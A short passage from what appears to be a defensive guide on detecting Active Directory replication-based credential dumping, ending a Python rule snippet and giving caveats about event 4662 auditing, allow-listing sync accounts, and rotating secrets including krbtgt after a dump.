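        print(f"[{rule}] {detail}")
```

Two caveats before using rules like these in production: 4662 is only written when Directory Service Access auditing is enabled and the domain object's SACL covers the replication rights, and accounts that legitimately replicate (Azure AD Connect's synchronization account, for instance) need an allow-list on the 4662 rule. On the response side, a dump like the one above means every exposed secret has to be rotated, including the krbtgt account (reset twice) and the machine account, not just the user passwords that were recovered in clear text.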